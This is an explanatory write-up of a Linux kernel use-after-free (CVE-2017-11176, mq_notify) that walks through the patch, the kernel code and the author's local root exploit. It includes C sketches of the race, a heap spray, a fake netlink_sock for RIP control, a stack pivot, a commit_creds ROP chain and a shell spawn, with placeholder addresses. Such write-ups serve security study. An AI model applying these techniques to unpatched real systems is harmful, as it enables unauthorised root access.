-----------------------------[CVE-2017-11176]----------------------------------
-------------------------------------------------------------------------------
CVE-2017-11176, aka "mq_notify: double sock_put()", is an exploitable bug that was
patched in 2017.
The patch is only one line, which is interesting:
diff --git a/ipc/mqueue.c b/ipc/mqueue.c
index c9ff943..eb1391b 100644
--- a/ipc/mqueue.c
+++ b/ipc/mqueue.c
@@ -1270,8 +1270,10 @@ retry:
             timeo = MAX_SCHEDULE_TIMEOUT;
             ret = netlink_attachskb(sock, nc, &timeo, NULL);
-            if (ret == 1)
+            if (ret == 1) {
+                sock = NULL;
                 goto retry;
+            }
             if (ret) {
                 sock = NULL;
                 nc = NULL;
It only sets sock to NULL before retrying, and there is no bug anymore.
CVE description:
The mq_notify function in the Linux kernel through 4.11.9 does not set the sock
pointer to NULL upon entry into the retry logic. During a user-space close of a
Netlink socket, it allows attackers to cause a denial of service (use-after-free)
or possibly have unspecified other impact.
From the CVE description we know that:
- The vulnerable syscall is `mq_notify`.
- It involves Netlink sockets, specifically some retry logic.
- The last vulnerable kernel is 4.11.9.
- The bug can cause a denial of service or possibly other impact (LPE in this case).
I developed my exploit under Linux 4.11.8, using SLAB as the dynamic memory
allocator. The protection mechanisms are the default ones: SMAP and SMEP are both
enabled, KASLR is disabled (KASLR is enabled by default starting with version 4.12).
The vulnerability we have is a UAF (I will show you why).
Because the vulnerable syscall is mq_notify, I first went to read what the manual
has to say about this syscall.
I found that this syscall lets a process register for a notification when a new
message arrives on an empty message queue.
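To play with it from userland you first need a message queue descriptor. A minimal
sketch (the queue name is arbitrary; link with -lrt):

/* Sketch: obtain the mqd_t that mq_notify() operates on. */
#include <fcntl.h>
#include <mqueue.h>

static mqd_t open_queue(void)
{
    return mq_open("/pwn_queue", O_RDWR | O_CREAT, 0666, NULL);
}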
I will take you through the code now; don't feel overwhelmed, the vulnerability
is easy to find.
SYSCALL_DEFINE2(mq_notify, mqd_t, mqdes,
        const struct sigevent __user *, u_notification)
{
    int ret;
    struct fd f;
    struct sock *sock;
    struct inode *inode;
    struct sigevent notification;
    struct mqueue_inode_info *info;
    struct sk_buff *nc;

    if (u_notification) {
        if (copy_from_user(&notification, u_notification,
                    sizeof(struct sigevent)))
            return -EFAULT;
    }

    audit_mq_notify(mqdes, u_notification ? &notification : NULL);

    nc = NULL;
    sock = NULL;
    if (u_notification != NULL) {
        if (unlikely(notification.sigev_notify != SIGEV_NONE &&
                 notification.sigev_notify != SIGEV_SIGNAL &&
                 notification.sigev_notify != SIGEV_THREAD))
            return -EINVAL;
        if (notification.sigev_notify == SIGEV_SIGNAL &&
            !valid_signal(notification.sigev_signo)) {
            return -EINVAL;
        }
        if (notification.sigev_notify == SIGEV_THREAD) {
            long timeo;

            /* create the notify skb */
            nc = alloc_skb(NOTIFY_COOKIE_LEN, GFP_KERNEL);
            if (!nc) {
                ret = -ENOMEM;
                goto out;
            }
            if (copy_from_user(nc->data,
                    notification.sigev_value.sival_ptr,
                    NOTIFY_COOKIE_LEN)) {
                ret = -EFAULT;
                goto out;
            }

            /* TODO: add a header? */
            skb_put(nc, NOTIFY_COOKIE_LEN);

            /* and attach it to the socket */
retry:
            f = fdget(notification.sigev_signo);
            if (!f.file) {
                ret = -EBADF;
                goto out;
            }
            sock = netlink_getsockbyfilp(f.file);
            fdput(f);
            if (IS_ERR(sock)) {
                ret = PTR_ERR(sock);
                sock = NULL;
                goto out;
            }

            timeo = MAX_SCHEDULE_TIMEOUT;
            ret = netlink_attachskb(sock, nc, &timeo, NULL);
            if (ret == 1)
                goto retry;
            if (ret) {
                sock = NULL;
                nc = NULL;
                goto out;
            }
        }
    }
    ...
out:
    if (sock)
        netlink_detachskb(sock, nc);
    else if (nc)
        dev_kfree_skb(nc);

    return ret;
}
First it takes the sigevent we provide and copies it into the kernel.
It makes some sanity checks on the sigev_notify field; we will provide
SIGEV_THREAD as our sigev_notify (to enter the interesting path).
Now it calls alloc_skb(), which allocates a socket buffer and returns it into nc;
we will get a valid address for nc (unless the system runs out of memory), so we
pass the check. Then comes another copy_from_user(), which means sival_ptr must
be a valid userland address.
Then a call to skb_put(), which accounts for the data we just added to our socket
buffer; the length here is NOTIFY_COOKIE_LEN (32 bytes).
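Driving this path from userland looks roughly like this (a sketch, with mqd and
nl_fd assumed to be a valid queue descriptor and a netlink socket fd; note the raw
syscall, since the glibc mq_notify() wrapper handles SIGEV_THREAD differently):

/* Sketch: reach the SIGEV_THREAD path of the mq_notify syscall. */
#define _GNU_SOURCE
#include <mqueue.h>
#include <signal.h>
#include <sys/syscall.h>
#include <unistd.h>

static int trigger_mq_notify(mqd_t mqd, int nl_fd)
{
    static char cookie[32];              /* NOTIFY_COOKIE_LEN readable bytes */
    struct sigevent sev = { 0 };

    sev.sigev_notify = SIGEV_THREAD;     /* enter the interesting path   */
    sev.sigev_signo = nl_fd;             /* fdget() treats this as an fd */
    sev.sigev_value.sival_ptr = cookie;  /* source for copy_from_user()  */

    return syscall(__NR_mq_notify, mqd, &sev);
}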
Now we have reached the retry label; that's the `retry logic` the CVE description
was talking about.
What's wrong with this retry logic? Let's find out.
First it calls fdget() on an fd that we control (from userspace).
fdget() will take a reference on the file we provide and increment its refcount.
We will provide a valid fd, so we don't fail here with -EBADF.
Now comes netlink_getsockbyfilp(), here is the source code:
struct sock *netlink_getsockbyfilp(struct file *filp)
{
    struct inode *inode = file_inode(filp);
    struct sock *sock;

    if (!S_ISSOCK(inode->i_mode))
        return ERR_PTR(-ENOTSOCK);

    sock = SOCKET_I(inode)->sk;
    if (sock->sk_family != AF_NETLINK)
        return ERR_PTR(-EINVAL);

    sock_hold(sock);
    return sock;
}
First it checks whether the file we provided is actually a socket (there are 7
types of files you can open and get back an fd for: regular file, directory,
symbolic link, character device, block device, socket and fifo).
Next it takes the sk field (since the inode belongs to a socket, SOCKET_I()
recovers the enclosing struct socket, whose sk field is a struct sock *).
It then checks that the family is AF_NETLINK (if you take a look at the exploit,
we use this family to pass the check).
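Creating a socket that passes both checks is straightforward (a sketch;
NETLINK_USERSOCK is one protocol an unprivileged user can use here):

/* Sketch: a socket file whose family is AF_NETLINK, so it survives
 * both checks in netlink_getsockbyfilp(). */
#include <sys/socket.h>
#include <linux/netlink.h>

static int make_netlink_sock(void)
{
    return socket(AF_NETLINK, SOCK_DGRAM, NETLINK_USERSOCK);
}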
Now it will call sock_hold(), what this function does is:
static __always_inline void sock_hold(struct sock *sk)
{
    atomic_inc(&sk->sk_refcnt);
}
So it increments the socket's refcount.
When this function returns, we call fdput():
fdput() -> fput() -> atomic_long_dec_and_test(&file->f_count)
fdput() releases the reference taken by fdget() and decrements the file's
refcount by one.
Now we are calling netlink_attachskb(), and this is an important function: our
exploit relies on its return value (we force it to return 1), because that is
exactly what sends execution back to retry.
int netlink_attachskb(struct sock *sk, struct sk_buff *skb,
                      long *timeo, struct sock *ssk)
{
    struct netlink_sock *nlk;

    nlk = nlk_sk(sk);

    if ((atomic_read(&sk->sk_rmem_alloc) > sk->sk_rcvbuf ||
         test_bit(NETLINK_S_CONGESTED, &nlk->state))) {
        DECLARE_WAITQUEUE(wait, current);
        if (!*timeo) {
            if (!ssk || netlink_is_kernel(ssk))
                netlink_overrun(sk);
            sock_put(sk);
            kfree_skb(skb);
            return -EAGAIN;
        }

        __set_current_state(TASK_INTERRUPTIBLE);
        add_wait_queue(&nlk->wait, &wait);

        if ((atomic_read(&sk->sk_rmem_alloc) > sk->sk_rcvbuf ||
             test_bit(NETLINK_S_CONGESTED, &nlk->state)) &&
            !sock_flag(sk, SOCK_DEAD))
            *timeo = schedule_timeout(*timeo);

        __set_current_state(TASK_RUNNING);
        remove_wait_queue(&nlk->wait, &wait);
        sock_put(sk);

        if (signal_pending(current)) {
            kfree_skb(skb);
            return sock_intr_errno(*timeo);
        }
        return 1;
    }
    netlink_skb_set_owner_r(skb, sk);
    return 0;
}
First of all, it checks whether sk_rmem_alloc (the amount of data currently
queued in the receive buffer; it can grow past the limit) is bigger than
sk_rcvbuf (the configured limit, just a theoretical value). If the condition is
met, we enter the branch we want (to return 1).
For the second condition (after the `||` operator), here is the test_bit()
implementation:
static inline int
test_bit(int nr, const volatile void *addr)
{
    return (1UL & (((const int *)addr)[nr >> 5] >> (nr & 31))) != 0UL;
}
Because NETLINK_S_CONGESTED is 0x0, the condition becomes: (1 & nlk->state)
This condition looks easy to satisfy and would take us to the branch we want, but
it turned out to be hard in practice, so I satisfied the first condition instead:
the exploit calls a function named flood() to fill sk_rmem_alloc and make it
bigger than sk_rcvbuf.
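The idea of flood() is roughly this (a simplified sketch, not the exploit's exact
code; it assumes the target socket was bound to a known nl_pid and that the sender
is a second NETLINK_USERSOCK socket):

/* Sketch: fill the target's receive buffer so sk_rmem_alloc grows past
 * sk_rcvbuf and netlink_attachskb() takes the blocking branch. */
#include <string.h>
#include <sys/socket.h>
#include <linux/netlink.h>

static void flood(int sender_fd, struct sockaddr_nl *target_addr)
{
    char buf[1024];

    memset(buf, 'A', sizeof(buf));
    /* MSG_DONTWAIT: stop as soon as the peer's receive buffer is full */
    while (sendto(sender_fd, buf, sizeof(buf), MSG_DONTWAIT,
                  (struct sockaddr *)target_addr, sizeof(*target_addr)) > 0)
        ;
}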
Now that we're inside the branch we want, it sets our task (the main thread) to
TASK_INTERRUPTIBLE and adds it to the socket's wait queue using add_wait_queue();
then it calls schedule_timeout() and our task blocks, waiting for another thread
to wake it up. I implemented this in my exploit: you can wake it up using
setsockopt() from another thread (see the sketch after the race discussion below).
After waking up, it sets our task state back to TASK_RUNNING (running on a CPU,
or about to be) and removes it from the wait queue (not waiting anymore).
Now sock_put() will be called, and this is what sock_put() does:
static inline void sock_put(struct sock *sk)
{
    if (atomic_dec_and_test(&sk->sk_refcnt))
        sk_free(sk);
}
It atomically decrements the socket's refcount and, if it reaches zero, frees the
socket. As expected!
You can ignore the signal_pending() call; it only tests the TIF_SIGPENDING flag
in our task_struct, which is not set in our case, so it returns 0.
Now we are returning 1 from netlink_attachskb()! finally!
Now back to the very first function: if (ret == 1), it goes back to retry.
What if we close our socket fd in the window between netlink_attachskb()
returning 1 and execution going back to retry?
Closing the fd drops the file's refcount by one, but the file itself stays alive
because we still hold a second reference to it obtained with the dup() syscall.
The sock's refcount, meanwhile, has already been dropped once by the sock_put()
inside netlink_attachskb().
Now fdget() will return an error because that fd is closed, and execution is
transferred to the out label.
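The racing thread looks roughly like this (a sketch; sock_fd is the fd we gave to
mq_notify, sock_fd2 = dup(sock_fd) keeps the file alive and gives us a handle to
wake the sleeper with, since setting NETLINK_NO_ENOBUFS ends up calling
wake_up_interruptible() on nlk->wait):

/* Sketch: close the fd that retry's fdget() will look up, then wake
 * the main thread blocked inside netlink_attachskb(). */
#include <sys/socket.h>
#include <unistd.h>
#include <linux/netlink.h>

static int sock_fd, sock_fd2;   /* set up earlier: sock_fd2 = dup(sock_fd) */

static void *unblock_thread(void *arg)
{
    int val = 1;

    (void)arg;
    close(sock_fd);                       /* fdget() in retry now fails   */
    setsockopt(sock_fd2, SOL_NETLINK, NETLINK_NO_ENOBUFS,
               &val, sizeof(val));        /* wake the blocked main thread */
    return NULL;
}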
out:
    if (sock)
        netlink_detachskb(sock, nc);
    else if (nc)
        dev_kfree_skb(nc);
Because sock is not NULLed, netlink_detachskb() will be called on the stale sock
pointer:
void netlink_detachskb(struct sock *sk, struct sk_buff *skb)
{
    kfree_skb(skb);
    sock_put(sk);
}
sock_put() will decrement the refcount once again! And that is the vulnerability
behind this CVE: a double decrement of the sock refcount, which gets the sock
freed while a reference to it still exists.
I understand it like this:

file -> sock
refcount: 2 -> 2

After executing the vulnerability:

file -> sock
refcount: 1 -> 0

(-1 from the sock_put() in netlink_attachskb(), and another -1 when going to out
and executing netlink_detachskb().)
Now we have a UAF, and we can allocate whatever we want on top of that dangling
netlink_sock.
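One classic reallocation primitive for this (a hedged sketch of the general
technique, not necessarily the exact one used here) is spraying ancillary data:
sendmsg() copies msg_control into a kmalloc'd kernel buffer of our chosen size,
so a payload sized like struct netlink_sock can reclaim the freed slot. Keeping
the buffer alive long enough (e.g. by making the send block) is glossed over here:

/* Sketch: cmsg-based reallocation of the freed netlink_sock slot. */
#include <string.h>
#include <sys/socket.h>
#include <sys/uio.h>

static void realloc_once(int fd, const void *payload, size_t size)
{
    char control[4096];
    char dummy = 'A';
    struct iovec iov = { .iov_base = &dummy, .iov_len = 1 };
    struct msghdr msg;

    memcpy(control, payload, size);  /* assumes size <= sizeof(control)    */
    memset(&msg, 0, sizeof(msg));
    msg.msg_iov = &iov;
    msg.msg_iovlen = 1;
    msg.msg_control = control;       /* copied into a kmalloc'd buffer     */
    msg.msg_controllen = size;       /* pick it to match the target cache  */

    sendmsg(fd, &msg, MSG_DONTWAIT);
}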
To turn this UAF into RIP control, I found that netlink_release() can give it to
us if we can satisfy some requirements:
static int netlink_release(struct socket *sock)
{
    struct sock *sk = sock->sk;
    struct netlink_sock *nlk;

    if (!sk)
        return 0;

    netlink_remove(sk);
    sock_orphan(sk);
    nlk = nlk_sk(sk);

    /*
     * OK. Socket is unlinked, any packets that arrive now
     * will be purged.
     */

    /* must not acquire netlink_table_lock in any way again before unbind
     * and notifying genetlink is done as otherwise it might deadlock
     */
    if (nlk->netlink_unbind) {
        int i;

        for (i = 0; i < nlk->ngroups; i++)
            if (test_bit(i, nlk->groups))
                nlk->netlink_unbind(sock_net(sk), i + 1); /* [RIP CONTROL] */
    ...
This code can be reached by calling close(sock_fd).
nlk->netlink_unbind() is controlled through the UAF. You can ignore
netlink_remove() and sock_orphan(); they don't crash our kernel.
To reach that line of code, we first need to make nlk->ngroups 1 (or any positive
number), and point nlk->groups at a kernel address whose first bit is set, so
that test_bit() returns nonzero and we enter nlk->netlink_unbind(). In my exploit
I made that function pointer printk, lol.
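Put together, the few fields the release path actually needs from our sprayed
object look like this (a sketch; in the real payload they must sit at their exact
struct netlink_sock offsets for the target kernel, which are not reproduced here):

/* Sketch: the only fields netlink_release() dereferences on our fake object. */
struct fake_netlink_sock_fields {
    unsigned int ngroups;       /* 1: the for loop runs exactly once   */
    unsigned long *groups;      /* -> kernel memory whose bit 0 is set */
    void (*netlink_unbind)(void *net, int group); /* RIP control       */
};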
Now that we control RIP, what do we do with it? (SMEP and SMAP are enabled.)
I found that RBP is pointing to our UAF chunk, and I found this stack-pivot
gadget (bypassing SMAP, since the ROP chain lives in kernel memory we control):
lea rsp, [rbp - 0x28] ; pop rbx ; pop r12 ; pop r13 ; pop r14 ; pop r15
; pop rbp ; ret
This is perfect if we can place our ROP chain at the head of our UAF chunk, and
it worked perfectly.
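The chain layout ends up roughly like this (a hedged sketch: after the pivot the
gadget pops six qwords before its ret, so the 7th qword is the first gadget that
actually runs; every address below is a placeholder to be resolved against the
target kernel, not a real 4.11.8 address):

/* Sketch of the pivoted stack laid over the UAF chunk. */
#define POP_RDI_RET          0xffffffff81000001UL /* placeholder */
#define PREPARE_KERNEL_CRED  0xffffffff81000002UL /* placeholder */
#define MOV_RDI_RAX_RET      0xffffffff81000003UL /* placeholder */
#define COMMIT_CREDS         0xffffffff81000004UL /* placeholder */
#define SWAPGS_IRETQ_RETURN  0xffffffff81000005UL /* placeholder */

static const unsigned long chain[] = {
    0, 0, 0, 0, 0, 0,        /* consumed by pop rbx/r12/r13/r14/r15/rbp */
    POP_RDI_RET,             /* first executed gadget                   */
    0,                       /* rdi = NULL                              */
    PREPARE_KERNEL_CRED,     /* rax = prepare_kernel_cred(NULL)         */
    MOV_RDI_RAX_RET,         /* rdi = rax (fresh root cred)             */
    COMMIT_CREDS,            /* commit_creds(rdi)                       */
    SWAPGS_IRETQ_RETURN,     /* back to userland                        */
};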
We simply call commit_creds(prepare_kernel_cred(NULL)) and return to userland to
pop a shell.
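Back in userland the chain lands on the usual function (a sketch):

/* Sketch: userland landing point after the iretq trampoline. */
#include <unistd.h>

static void pop_shell(void)
{
    char *argv[] = { "/bin/sh", NULL };

    if (getuid() == 0)
        execve("/bin/sh", argv, NULL);
}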
I enjoyed writing this exploit, and it took me a while to complete it.
Lexfo did a great job explaining every step of developing their exploit on a
production kernel (a real system running on real hardware, not emulation).
They used SystemTap to debug their exploit. I highly recommend reading their
write-up about this specific CVE.
References:
https://blog.lexfo.fr/cve-2017-11176-linux-kernel-exploitation-part1.html
https://elixir.bootlin.com/linux/v4.11.8/source/ipc/mqueue.c#L1191
https://man7.org/linux/man-pages/man3/mq_notify.3.html
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11176